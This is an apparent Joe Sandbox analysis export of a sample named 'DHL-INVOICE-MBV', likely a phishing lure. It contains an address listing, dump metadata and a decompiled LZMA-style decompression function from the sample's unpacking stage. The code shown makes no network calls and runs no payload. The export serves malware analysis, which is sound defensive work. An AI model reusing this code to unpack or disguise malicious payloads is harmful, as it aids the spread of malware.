0x00406c7d
0x00406c82
0x00000000
0x00406c82
0x00406c33
0x00406c36
0x00406c39
0x00406c43
0x00406ffa
0x00406ffa
0x00406ffa
0x00000000
0x00406ffa
0x00000000
0x00406c97
0x00406c9b
0x00406cbe
0x00406cc1
0x00406cc4
0x00406cce
0x00406c9d
0x00406c9d
0x00406ca0
0x00406ca3
0x00406ca6
0x00406cb3
0x00406cb6
0x00406cb6
0x00406ffa
0x00406ffa
0x00406ffa
0x00000000
0x00406ffa
0x00000000
0x00406cda
0x00406cde
0x00000000
0x00000000
0x00406ce4
0x00406ce8
0x00000000
0x00000000
0x00406cee
0x00406cf0
0x00406cf4
0x00406cf4
0x00406cf7
0x00406cfb
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d72
0x00406d76
0x00406d7d
0x00406d80
0x00406d83
0x00406d78
0x00406d78
0x00406d78
0x00406d86
0x00406d89
0x00000000
0x00000000
0x00406e32
0x00406e32
0x00406e36
0x004071d4
0x00000000
0x004071d4
0x00406e3c
0x00406e3f
0x00406e42
0x00406e46
0x00406e49
0x00406e4f
0x00406e51
0x00406e51
0x00406e51
0x00406e54
0x00406e57
0x00000000
0x00000000
0x00406a27
0x00406a27
0x00406a2b
0x00407198
0x00000000
0x00407198
0x00406a31
0x00406a34
0x00406a37
0x00406a3b
0x00406a3e
0x00406a44
0x00406a46
0x00406a46
0x00406a46
0x00406a49
0x00406a4c
0x00406a4c
0x00406a4f
0x00406a52
0x00000000
0x00000000
0x00406a58
0x00406a5e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a75
0x00406a78
0x00406a7a
0x00406a80
0x00406a83
0x00406a86
0x00406a89
0x00406a8c
0x00406a8f
0x00406a92
0x00406aae
0x00406ab1
0x00406ab4
0x00406ab7
0x00406abe
0x00406ac2
0x00406ac4
0x00406ac8
0x00406a94
0x00406a94
0x00406a98
0x00406aa0
0x00406aa5
0x00406aa7
0x00406aa9
0x00406aa9
0x00406acb
0x00406ad2
0x00406ad5
0x00000000
0x00406adb
0x00000000
0x00406adb
0x00000000
0x00406ae0
0x00406ae0
0x00406ae4
0x004071a4
0x00000000
0x004071a4
0x00406aea
0x00406aed
0x00406af0
0x00406af4
0x00406af7
0x00406afd
0x00406aff
0x00406aff
0x00406aff
0x00406b02
0x00406b05
0x00406b05
0x00406b05
0x00406b0b
0x00000000
0x00000000
0x00406b0d
0x00406b10
0x00406b13
0x00406b16
0x00406b19
0x00406b1c
0x00406b1f
0x00406b22
0x00406b25
0x00406b28
0x00406b2b
0x00406b43
0x00406b46
0x00406b49
0x00406b4c
0x00406b4c
0x00406b4f
0x00406b53
0x00406b55
0x00406b2d
0x00406b2d
0x00406b35
0x00406b3a
0x00406b3c
0x00406b3e
0x00406b3e
0x00406b58
0x00406b5f
0x00406b62
0x00000000
0x00406b64
0x00000000
0x00406b64
0x00406b62
0x00406b69
0x00406b69
0x00406b69
0x00406b69
0x00000000
0x00000000
0x00406ba4
0x00406ba4
0x00406ba8
0x004071b0
0x00000000
0x004071b0
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb8
0x00406bbb
0x00406bc1
0x00406bc3
0x00406bc3
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bcf
0x00406b6d
0x00406b6d
0x00406b70
0x00000000
0x00406b70
0x00406bd1
0x00406bd1
0x00406bd4
0x00406bd7
0x00406bda
0x00406bdd
0x00406be0
0x00406be3
0x00406be6
0x00406be9
0x00406bec
0x00406bef
0x00406c07
0x00406c0a
0x00406c0d
0x00406c10
0x00406c10
0x00406c13
0x00406c17
0x00406c19
0x00406bf1
0x00406bf1
0x00406bf9
0x00406bfe
0x00406c00
0x00406c02
0x00406c02
0x00406c1c
0x00406c23
0x00406c26
0x00000000
0x00406c28
0x00000000
0x00406c28
0x00000000
0x00406eb5
0x00406eb5
0x00406eb9
0x004071e0
0x00000000
0x004071e0
0x00406ebf
0x00406ec2
0x00406ec5
0x00406ec9
0x00406ecc
0x00406ed2
0x00406ed4
0x00406ed4
0x00406ed4
0x00406ed7
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fc4
0x00406fc8
0x00406fea
0x00406fed
0x00406ff7
0x00406ffa
0x00406ffa
0x00406ffa
0x00000000
0x00406ffa
0x00406ffa
0x00406fca
0x00406fcd
0x00406fd1
0x00406fd4
0x00406fd4
0x00406fd7
0x00000000
0x00000000
0x00407081
0x00407085
0x004070a3
0x004070a3
0x004070a3
0x004070aa
0x004070b1
0x004070b8
0x004070b8
0x00000000
0x004070b8
0x00407087
0x0040708a
0x0040708d
0x00407090
0x00407097
0x00406fdb
0x00406fdb
0x00406fde
0x00000000
0x00000000
0x00407172
0x00407175
0x00407076
0x00000000
0x00000000
0x00406dac
0x00406dae
0x00406db5
0x00406db6
0x00406db8
0x00406dbb
0x00000000
0x00000000
0x00406dc3
0x00406dc6
0x00406dc9
0x00406dcb
0x00406dcd
0x00406dcd
0x00406dce
0x00406dd1
0x00406dd8
0x00406ddb
0x00406de9
0x00000000
0x00000000
0x004070bf
0x004070bf
0x004070c2
0x004070c9
0x00000000
0x00000000
0x004070ce
0x004070ce
0x004070d2
0x0040720a
0x00000000
0x0040720a
0x004070d8
0x004070db
0x004070de
0x004070e2
0x004070e5
0x004070eb
0x004070ed
0x004070ed
0x004070ed
0x004070f0
0x004070f3
0x004070f3
0x004070f3
0x004070f3
0x004070f6
0x004070f6
0x004070fa
0x0040715a
0x0040715d
0x00407162
0x00407163
0x00407165
0x00407167
0x0040716a
0x00407076
0x00407076
0x00000000
0x0040707c
0x00407076
0x004070fc
0x00407102
0x00407105
0x00407108
0x0040710b
0x0040710e
0x00407111
0x00407114
0x00407117
0x0040711a
0x0040711d
0x00407136
0x00407139
0x0040713c
0x0040713f
0x00407143
0x00407145
0x00407145
0x00407146
0x00407149
0x0040711f
0x0040711f
0x00407127
0x0040712c
0x0040712e
0x00407131
0x00407131
0x0040714c
0x00407153
0x00000000
0x00407155
0x00000000
0x00407155
0x00000000
0x00406df1
0x00406df4
0x00406e2a
0x00406f5a
0x00406f5a
0x00406f5a
0x00406f5a
0x00406f5d
0x00406f5d
0x00406f60
0x00406f62
0x004071ec
0x00000000
0x004071ec
0x00406f68
0x00406f6b
0x00000000
0x00000000
0x00406f71
0x00406f75
0x00406f78
0x00406f78
0x00406f78
0x00000000
0x00406f78
0x00406df6
0x00406df8
0x00406dfa
0x00406dfc
0x00406dff
0x00406e00
0x00406e02
0x00406e04
0x00406e07
0x00406e0a
0x00406e20
0x00406e25
0x00406e5d
0x00406e5d
0x00406e61
0x00406e8d
0x00406e8f
0x00406e96
0x00406e99
0x00406e9c
0x00406e9c
0x00406ea1
0x00406ea1
0x00406ea3
0x00406ea6
0x00406ead
0x00406eb0
0x00406edd
0x00406edd
0x00406ee0
0x00406ee3
0x00406f57
0x00406f57
0x00406f57
0x00000000
0x00406f57
0x00406ee5
0x00406eeb
0x00406eee
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f03
0x00406f06
0x00406f1f
0x00406f21
0x00406f24
0x00406f25
0x00406f28
0x00406f2a
0x00406f2d
0x00406f2f
0x00406f31
0x00406f34
0x00406f36
0x00406f39
0x00406f3d
0x00406f3f
0x00406f3f
0x00406f40
0x00406f43
0x00406f46
0x00406f08
0x00406f08
0x00406f10
0x00406f15
0x00406f17
0x00406f1a
0x00406f1a
0x00406f49
0x00406f50
0x00406eda
0x00406eda
0x00406eda
0x00406eda
0x00000000
0x00406f52
0x00000000
0x00406f52
0x00406f50
0x00406e63
0x00406e66
0x00406e68
0x00406e6b
0x00406e6e
0x00406e71
0x00406e73
0x00406e76
0x00406e79
0x00406e79
0x00406e7c
0x00406e7c
0x00406e7f
0x00406e86
0x00406e5a
0x00406e5a
0x00406e5a
0x00406e5a
0x00000000
0x00406e88
0x00000000
0x00406e88
0x00406e86
0x00406e0c
0x00406e0f
0x00406e11
0x00406e14
0x00000000
0x00000000
0x00406b73
0x00406b73
0x00406b77
0x004071bc
0x00000000
0x004071bc
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b89
0x00406b8c
0x00406b8f
0x00406b91
0x00406b94
0x00406b97
0x00406b9a
0x00406b9c
0x00406b9c
0x00406b9c
0x00000000
0x00000000
0x00406cfe
0x00406cfe
0x00406d02
0x004071c8
0x00000000
0x004071c8
0x00406d08
0x00406d0b
0x00406d0e
0x00406d11
0x00406d13
0x00406d13
0x00406d13
0x00406d16
0x00406d19
0x00406d1c
0x00406d1f
0x00406d22
0x00406d25
0x00406d26
0x00406d28
0x00406d28
0x00406d28
0x00406d2b
0x00406d2e
0x00406d31
0x00406d34
0x00406d34
0x00406d34
0x00406d37
0x00406d39
0x00406d39
0x00000000
0x00000000
0x00406f7b
0x00406f7b
0x00406f7b
0x00406f7f
0x00000000
0x00000000
0x00406f85
0x00406f88
0x00406f8b
0x00406f8e
0x00406f90
0x00406f90
0x00406f90
0x00406f93
0x00406f96
0x00406f99
0x00406f9c
0x00406f9f
0x00406fa2
0x00406fa3
0x00406fa5
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb8
0x00406fba
0x00406fbd
0x00000000
0x00406fbf
0x00406d3c
0x00406d3c
0x00000000
0x00406d3c
0x00406fbd
0x004071f2
0x00000000
0x00000000
0x00406821
0x00407229
0x00407229
0x00000000
0x00407229
0x00407076
0x00406ffd
0x00406ffa
0x00000000
0x00406d4f

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406C97() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407231))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
